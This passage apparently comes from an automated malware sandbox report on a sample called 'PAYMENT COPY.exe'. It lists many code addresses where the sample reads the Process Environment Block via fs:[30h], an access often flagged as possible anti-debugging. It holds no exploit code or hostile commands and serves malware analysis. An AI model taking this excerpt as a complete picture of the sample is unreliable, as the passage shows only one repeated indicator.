Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594500 mov eax, dword ptr fs:[00000030h]	9_2_01594500
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]	9_2_014EE53E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]	9_2_014EE53E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]	9_2_014EE53E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]	9_2_014EE53E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE53E mov eax, dword ptr fs:[00000030h]	9_2_014EE53E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0535 mov eax, dword ptr fs:[00000030h]	9_2_014D0535
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE5CF mov eax, dword ptr fs:[00000030h]	9_2_014FE5CF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE5CF mov eax, dword ptr fs:[00000030h]	9_2_014FE5CF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C65D0 mov eax, dword ptr fs:[00000030h]	9_2_014C65D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA5D0 mov eax, dword ptr fs:[00000030h]	9_2_014FA5D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA5D0 mov eax, dword ptr fs:[00000030h]	9_2_014FA5D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC5ED mov eax, dword ptr fs:[00000030h]	9_2_014FC5ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC5ED mov eax, dword ptr fs:[00000030h]	9_2_014FC5ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EE5E7 mov eax, dword ptr fs:[00000030h]	9_2_014EE5E7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C25E0 mov eax, dword ptr fs:[00000030h]	9_2_014C25E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F4588 mov eax, dword ptr fs:[00000030h]	9_2_014F4588
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C2582 mov eax, dword ptr fs:[00000030h]	9_2_014C2582
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C2582 mov ecx, dword ptr fs:[00000030h]	9_2_014C2582
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE59C mov eax, dword ptr fs:[00000030h]	9_2_014FE59C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015405A7 mov eax, dword ptr fs:[00000030h]	9_2_015405A7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015405A7 mov eax, dword ptr fs:[00000030h]	9_2_015405A7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015405A7 mov eax, dword ptr fs:[00000030h]	9_2_015405A7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E45B1 mov eax, dword ptr fs:[00000030h]	9_2_014E45B1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E45B1 mov eax, dword ptr fs:[00000030h]	9_2_014E45B1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157A456 mov eax, dword ptr fs:[00000030h]	9_2_0157A456
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FE443 mov eax, dword ptr fs:[00000030h]	9_2_014FE443
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E245A mov eax, dword ptr fs:[00000030h]	9_2_014E245A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B645D mov eax, dword ptr fs:[00000030h]	9_2_014B645D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154C460 mov ecx, dword ptr fs:[00000030h]	9_2_0154C460
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EA470 mov eax, dword ptr fs:[00000030h]	9_2_014EA470
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EA470 mov eax, dword ptr fs:[00000030h]	9_2_014EA470
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014EA470 mov eax, dword ptr fs:[00000030h]	9_2_014EA470
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F8402 mov eax, dword ptr fs:[00000030h]	9_2_014F8402
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F8402 mov eax, dword ptr fs:[00000030h]	9_2_014F8402
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F8402 mov eax, dword ptr fs:[00000030h]	9_2_014F8402
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BE420 mov eax, dword ptr fs:[00000030h]	9_2_014BE420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BE420 mov eax, dword ptr fs:[00000030h]	9_2_014BE420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BE420 mov eax, dword ptr fs:[00000030h]	9_2_014BE420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014BC427 mov eax, dword ptr fs:[00000030h]	9_2_014BC427
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01546420 mov eax, dword ptr fs:[00000030h]	9_2_01546420
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA430 mov eax, dword ptr fs:[00000030h]	9_2_014FA430
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C04E5 mov ecx, dword ptr fs:[00000030h]	9_2_014C04E5
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0157A49A mov eax, dword ptr fs:[00000030h]	9_2_0157A49A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154A4B0 mov eax, dword ptr fs:[00000030h]	9_2_0154A4B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C64AB mov eax, dword ptr fs:[00000030h]	9_2_014C64AB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F44B0 mov ecx, dword ptr fs:[00000030h]	9_2_014F44B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502750 mov eax, dword ptr fs:[00000030h]	9_2_01502750
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502750 mov eax, dword ptr fs:[00000030h]	9_2_01502750
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01544755 mov eax, dword ptr fs:[00000030h]	9_2_01544755
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F674D mov esi, dword ptr fs:[00000030h]	9_2_014F674D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F674D mov eax, dword ptr fs:[00000030h]	9_2_014F674D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F674D mov eax, dword ptr fs:[00000030h]	9_2_014F674D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154E75D mov eax, dword ptr fs:[00000030h]	9_2_0154E75D
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0750 mov eax, dword ptr fs:[00000030h]	9_2_014C0750
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C8770 mov eax, dword ptr fs:[00000030h]	9_2_014C8770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D0770 mov eax, dword ptr fs:[00000030h]	9_2_014D0770
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC700 mov eax, dword ptr fs:[00000030h]	9_2_014FC700
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C0710 mov eax, dword ptr fs:[00000030h]	9_2_014C0710
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F0710 mov eax, dword ptr fs:[00000030h]	9_2_014F0710
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153C730 mov eax, dword ptr fs:[00000030h]	9_2_0153C730
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC720 mov eax, dword ptr fs:[00000030h]	9_2_014FC720
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC720 mov eax, dword ptr fs:[00000030h]	9_2_014FC720
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F273C mov eax, dword ptr fs:[00000030h]	9_2_014F273C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F273C mov ecx, dword ptr fs:[00000030h]	9_2_014F273C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F273C mov eax, dword ptr fs:[00000030h]	9_2_014F273C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CC7C0 mov eax, dword ptr fs:[00000030h]	9_2_014CC7C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015407C3 mov eax, dword ptr fs:[00000030h]	9_2_015407C3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E27ED mov eax, dword ptr fs:[00000030h]	9_2_014E27ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E27ED mov eax, dword ptr fs:[00000030h]	9_2_014E27ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E27ED mov eax, dword ptr fs:[00000030h]	9_2_014E27ED
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154E7E1 mov eax, dword ptr fs:[00000030h]	9_2_0154E7E1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C47FB mov eax, dword ptr fs:[00000030h]	9_2_014C47FB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C47FB mov eax, dword ptr fs:[00000030h]	9_2_014C47FB
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156678E mov eax, dword ptr fs:[00000030h]	9_2_0156678E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C07AF mov eax, dword ptr fs:[00000030h]	9_2_014C07AF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015747A0 mov eax, dword ptr fs:[00000030h]	9_2_015747A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DC640 mov eax, dword ptr fs:[00000030h]	9_2_014DC640
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA660 mov eax, dword ptr fs:[00000030h]	9_2_014FA660
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA660 mov eax, dword ptr fs:[00000030h]	9_2_014FA660
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158866E mov eax, dword ptr fs:[00000030h]	9_2_0158866E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158866E mov eax, dword ptr fs:[00000030h]	9_2_0158866E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F2674 mov eax, dword ptr fs:[00000030h]	9_2_014F2674
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D260B mov eax, dword ptr fs:[00000030h]	9_2_014D260B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01502619 mov eax, dword ptr fs:[00000030h]	9_2_01502619
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E609 mov eax, dword ptr fs:[00000030h]	9_2_0153E609
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C262C mov eax, dword ptr fs:[00000030h]	9_2_014C262C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014DE627 mov eax, dword ptr fs:[00000030h]	9_2_014DE627
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F6620 mov eax, dword ptr fs:[00000030h]	9_2_014F6620
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F8620 mov eax, dword ptr fs:[00000030h]	9_2_014F8620
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA6C7 mov ebx, dword ptr fs:[00000030h]	9_2_014FA6C7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FA6C7 mov eax, dword ptr fs:[00000030h]	9_2_014FA6C7
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0153E6F2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0153E6F2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0153E6F2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E6F2 mov eax, dword ptr fs:[00000030h]	9_2_0153E6F2
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015406F1 mov eax, dword ptr fs:[00000030h]	9_2_015406F1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015406F1 mov eax, dword ptr fs:[00000030h]	9_2_015406F1
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4690 mov eax, dword ptr fs:[00000030h]	9_2_014C4690
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4690 mov eax, dword ptr fs:[00000030h]	9_2_014C4690
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014FC6A6 mov eax, dword ptr fs:[00000030h]	9_2_014FC6A6
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F66B0 mov eax, dword ptr fs:[00000030h]	9_2_014F66B0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01540946 mov eax, dword ptr fs:[00000030h]	9_2_01540946
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01594940 mov eax, dword ptr fs:[00000030h]	9_2_01594940
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154C97C mov eax, dword ptr fs:[00000030h]	9_2_0154C97C
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E6962 mov eax, dword ptr fs:[00000030h]	9_2_014E6962
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E6962 mov eax, dword ptr fs:[00000030h]	9_2_014E6962
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E6962 mov eax, dword ptr fs:[00000030h]	9_2_014E6962
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01564978 mov eax, dword ptr fs:[00000030h]	9_2_01564978
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01564978 mov eax, dword ptr fs:[00000030h]	9_2_01564978
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150096E mov eax, dword ptr fs:[00000030h]	9_2_0150096E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150096E mov edx, dword ptr fs:[00000030h]	9_2_0150096E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0150096E mov eax, dword ptr fs:[00000030h]	9_2_0150096E
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154C912 mov eax, dword ptr fs:[00000030h]	9_2_0154C912
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B8918 mov eax, dword ptr fs:[00000030h]	9_2_014B8918
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014B8918 mov eax, dword ptr fs:[00000030h]	9_2_014B8918
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E908 mov eax, dword ptr fs:[00000030h]	9_2_0153E908
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0153E908 mov eax, dword ptr fs:[00000030h]	9_2_0153E908
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154892A mov eax, dword ptr fs:[00000030h]	9_2_0154892A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0155892B mov eax, dword ptr fs:[00000030h]	9_2_0155892B
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0158A9D3 mov eax, dword ptr fs:[00000030h]	9_2_0158A9D3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015569C0 mov eax, dword ptr fs:[00000030h]	9_2_015569C0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]	9_2_014CA9D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]	9_2_014CA9D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]	9_2_014CA9D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]	9_2_014CA9D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]	9_2_014CA9D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014CA9D0 mov eax, dword ptr fs:[00000030h]	9_2_014CA9D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F49D0 mov eax, dword ptr fs:[00000030h]	9_2_014F49D0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154E9E0 mov eax, dword ptr fs:[00000030h]	9_2_0154E9E0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F29F9 mov eax, dword ptr fs:[00000030h]	9_2_014F29F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F29F9 mov eax, dword ptr fs:[00000030h]	9_2_014F29F9
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C09AD mov eax, dword ptr fs:[00000030h]	9_2_014C09AD
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C09AD mov eax, dword ptr fs:[00000030h]	9_2_014C09AD
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015489B3 mov esi, dword ptr fs:[00000030h]	9_2_015489B3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015489B3 mov eax, dword ptr fs:[00000030h]	9_2_015489B3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_015489B3 mov eax, dword ptr fs:[00000030h]	9_2_015489B3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D29A0 mov eax, dword ptr fs:[00000030h]	9_2_014D29A0
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014D2840 mov ecx, dword ptr fs:[00000030h]	9_2_014D2840
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4859 mov eax, dword ptr fs:[00000030h]	9_2_014C4859
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014C4859 mov eax, dword ptr fs:[00000030h]	9_2_014C4859
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014F0854 mov eax, dword ptr fs:[00000030h]	9_2_014F0854
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01556870 mov eax, dword ptr fs:[00000030h]	9_2_01556870
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_01556870 mov eax, dword ptr fs:[00000030h]	9_2_01556870
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154E872 mov eax, dword ptr fs:[00000030h]	9_2_0154E872
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154E872 mov eax, dword ptr fs:[00000030h]	9_2_0154E872
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0154C810 mov eax, dword ptr fs:[00000030h]	9_2_0154C810
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156483A mov eax, dword ptr fs:[00000030h]	9_2_0156483A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_0156483A mov eax, dword ptr fs:[00000030h]	9_2_0156483A
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]	9_2_014E2835
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]	9_2_014E2835
Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 9_2_014E2835 mov eax, dword ptr fs:[00000030h]	9_2_014E2835
